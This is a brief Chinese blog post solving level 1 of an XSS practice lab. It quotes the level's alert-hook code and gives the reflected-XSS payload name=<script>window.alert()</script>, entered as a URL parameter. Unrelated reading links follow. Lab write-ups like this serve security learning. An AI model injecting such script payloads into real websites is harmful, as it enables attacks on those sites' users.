XXS level1 - 润新知

XXS level1
level1

（1）查看PHP源码，发现可以通过调用window,alert()完成任务
```
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level2.php?keyword=test"; 
}
```
（2）
```
<h1 align=center>欢迎来到level1</h1>
<h2 align=center>欢迎用户test</h2><center><img src=level1.png></center>
<h3 align=center>payload的长度:4</h3></body>
```
可在url后面的参数内输入脚本,回车
```
name=<script>window.alert()</script>
```
点击“确定即可到第二关
由于无法解释的神圣旨意，我们徒然地到处找你；你就是孤独，你就是神秘，比恒河或者日落还要遥远。。。。。。
相关阅读:
python flsak 框架
 postman
压力测试和负载测试
 软件测试相关内容
 Linux常用基本命令
 leetcode刷题——反转字符串
 leetcode——搜索插入位置
 leetcode刷题——移除元素
 leetcode 刷题 ——删除排序数组中的重复项
 json.decoder.JSONDecodeError: Expecting value 错误的处理
原文地址：https://www.cnblogs.com/momoli/p/10493150.html